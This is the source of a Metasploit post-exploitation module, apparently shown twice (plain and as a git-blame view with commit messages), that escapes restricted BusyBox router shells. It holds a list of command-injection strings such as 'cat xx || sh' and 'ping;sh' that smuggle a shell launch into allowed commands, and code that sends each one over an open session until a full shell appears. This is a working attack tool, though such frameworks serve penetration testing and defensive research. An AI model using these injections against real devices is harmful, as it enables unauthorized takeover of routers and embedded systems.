modules/post/linux/busybox/jailbreak.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  METHODS = [
    'cat xx || sh',
    'ping || sh',
    'echo `sh >> /dev/ttyp0`',
    'ping `sh >> /dev/ttyp0`',
    'cat `sh >> /dev/ttyp0`',
    'cat xx;sh',
    'echo xx;sh',
    'ping;sh',
    'cat xx | sh',
    'ping | sh',
    'cat ($sh)',
    'cat xx && sh',
    'echo xx && sh',
    'ping && sh'
  ]

  def initialize
    super(
      'Name'         => 'BusyBox Jailbreak ',
      'Description'  => %q{
        This module will send a set of commands to an open session that is connected to a
        BusyBox limited shell (i.e. a router limited shell). It will try different known
        tricks to jailbreak the limited shell and get a full BusyBox shell.
      },
      'Author'       => 'Javier Vicente Vallejo',
      'License'      => MSF_LICENSE,
      'Platform'      => ['linux'],
      'SessionTypes'  => ['shell']
    )
  end

  def run
    res = false

    METHODS.each do |m|
      res = try_method(m)
      break if res
    end

    print_error('Unable to jailbreak device shell') unless res
  end

  def try_method(command)
      vprint_status("jailbreak sent: #{command}")
      session.shell_write("#{command}\n")
      (1..10).each do
        resp = session.shell_read
        next unless resp.to_s.length > 0
        vprint_status("jailbreak received: #{resp}")
        if resp.downcase =~ /busybox/i && resp.downcase =~ /built.*in shell/i
          print_good("Jailbreak accomplished with #{command}")
          return true
        end
      end

      false
  end
end
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00
Review jailbreak 2015-08-28 11:44:57 -05:00			`METHODS = [`
			`'cat xx \|\| sh',`
			`'ping \|\| sh',`
			'echo `sh >> /dev/ttyp0`',
			'ping `sh >> /dev/ttyp0`',
			'cat `sh >> /dev/ttyp0`',
			`'cat xx;sh',`
			`'echo xx;sh',`
			`'ping;sh',`
			`'cat xx \| sh',`
			`'ping \| sh',`
			`'cat ($sh)',`
Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00			`'cat xx && sh',`
			`'echo xx && sh',`
			`'ping && sh'`
Review jailbreak 2015-08-28 11:44:57 -05:00			`]`

Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`def initialize`
			`super(`
			`'Name' => 'BusyBox Jailbreak ',`
Review jailbreak 2015-08-28 11:44:57 -05:00			`'Description' => %q{`
Finished spelling issues 2017-09-17 16:00:04 -04:00			`This module will send a set of commands to an open session that is connected to a`
Review jailbreak 2015-08-28 11:44:57 -05:00			`BusyBox limited shell (i.e. a router limited shell). It will try different known`
			`tricks to jailbreak the limited shell and get a full BusyBox shell.`
			`},`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`'Author' => 'Javier Vicente Vallejo',`
			`'License' => MSF_LICENSE,`
			`'Platform' => ['linux'],`
			`'SessionTypes' => ['shell']`
			`)`
			`end`

			`def run`
Review jailbreak 2015-08-28 11:44:57 -05:00			`res = false`

			`METHODS.each do \|m\|`
			`res = try_method(m)`
			`break if res`
			`end`

			`print_error('Unable to jailbreak device shell') unless res`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`end`

Review jailbreak 2015-08-28 11:44:57 -05:00			`def try_method(command)`
			`vprint_status("jailbreak sent: #{command}")`
			`session.shell_write("#{command}\n")`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`(1..10).each do`
Review jailbreak 2015-08-28 11:44:57 -05:00			`resp = session.shell_read`
Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00			`next unless resp.to_s.length > 0`
			`vprint_status("jailbreak received: #{resp}")`
			`if resp.downcase =~ /busybox/i && resp.downcase =~ /built.*in shell/i`
Review jailbreak 2015-08-28 11:44:57 -05:00			`print_good("Jailbreak accomplished with #{command}")`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`return true`
			`end`
			`end`
Review jailbreak 2015-08-28 11:44:57 -05:00
			`false`
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers. 2015-08-10 18:29:41 +02:00			`end`
			`end`